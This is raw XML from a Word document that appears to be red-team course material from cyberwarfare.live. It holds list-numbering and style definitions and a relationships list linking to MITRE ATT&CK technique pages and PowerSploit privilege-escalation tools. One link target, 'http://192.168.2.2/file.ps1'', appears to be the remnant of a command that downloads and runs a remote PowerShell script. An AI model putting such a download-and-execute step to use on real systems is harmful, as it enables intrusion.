      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6675" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="954C1962">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8762" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0D72143E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10850" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="DF30B450">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="12937" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E92E250C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15025" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="34" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="78510F80"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A85C6524"/>
    <w:lvl w:ilvl="0" w:tplc="A91870DE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1787" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="75B879D0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2508" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8760DB1C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4355" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5A5E5736">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6211" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="4F4EF162">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8066" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="BCBAA81E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9922" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="246A784E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11777" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="A77A8AEC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="13633" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0D60895E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15488" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="35" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7D8939D4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="70249912"/>
    <w:lvl w:ilvl="0" w:tplc="EE249A04">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1042" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="44"/>
        <w:szCs w:val="44"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1DC68656">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1875" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="088A12A0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2595" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="FB4E9FFC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4675" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="05ECA160">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6750" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4724AAC6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8825" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="DB587216">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10900" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="2F80C1FE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="12975" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A0E2681E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15050" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1629311839">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="60834520">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="265893312">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1412969664">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="165176667">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="683017310">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2045013048">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="254018825">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1312296030">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="625740142">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="368840159">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1244141246">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1778407702">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="588344637">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="97674816">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="934556755">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1397049241">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1408267853">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1896351989">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1402101990">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1992564433">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1735543837">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1333994093">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="655306552">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1320310151">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="993413748">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="2132824555">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="2014139163">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="781416650">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1570840845">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="777261135">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1730573459">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="894001305">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="388380727">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="2084600596">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="747657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9E"/>
    <w:rsid w:val="001B199E"/>
    <w:rsid w:val="00545DDD"/>
    <w:rsid w:val="007A7B84"/>
    <w:rsid w:val="007F001E"/>
    <w:rsid w:val="00973595"/>
    <w:rsid w:val="009F3D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A4EF"/>
  <w15:docId w15:val="{0A6BA741-EBE9-4812-AEBE-9401AC42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2840" w:hanging="1525"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="88"/>
      <w:szCs w:val="88"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="978" w:lineRule="exact"/>
      <w:ind w:left="1464"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
      <w:sz w:val="88"/>
      <w:szCs w:val="88"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="80"/>
      <w:szCs w:val="80"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="729" w:lineRule="exact"/>
      <w:ind w:left="729"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="64"/>
      <w:szCs w:val="64"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="1464"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="60"/>
      <w:szCs w:val="60"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="1013" w:hanging="359"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="1058"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>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48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Prrafodelista">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="1824" w:hanging="359"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableParagraph">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="56"/>
      <w:ind w:left="22" w:right="3"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Textodelmarcadordeposicin">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="009F3D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99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.png"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="cyberwarfare.live" TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image165.png"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer42.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image135.jpeg"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image175.png"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1052" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.png"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer48.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer30.xml"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image144.png"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image156.png"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1543" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:support@cyberwarfare.live" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.jpeg"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer11.xml"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.jpeg"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.png"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer34.xml"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image164.jpeg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image176.jpeg"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.jpeg"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer44.xml"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer49.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.jpeg"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer10.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer26.xml"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer31.xml"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="cyberwarfare.live" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image145.png"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image157.jpeg"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image167.png"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.jpeg"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image177.png"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1537" TargetMode="External"/><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footer" Target="footer29.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.jpeg"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer35.xml"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.2.2/file.ps1%27)" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548" TargetMode="External"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546" TargetMode="External"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image183.png"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer50.xml"/><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footer" Target="footer15.xml"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer33.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer36.xml"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image158.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image168.jpeg"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image178.jpeg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:support@cyberwarfare.live"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2.png"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1537" TargetMode="External"/><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footer" Target="footer23.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.png"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image136.png"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.2.2/file.ps1%27)" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image169.png"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1068" TargetMode="Externa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48.png"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image184.jpeg"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:support@cyberwarfare.live" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer16.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer21.xml"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.jpeg"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image128.png"/><Relationship 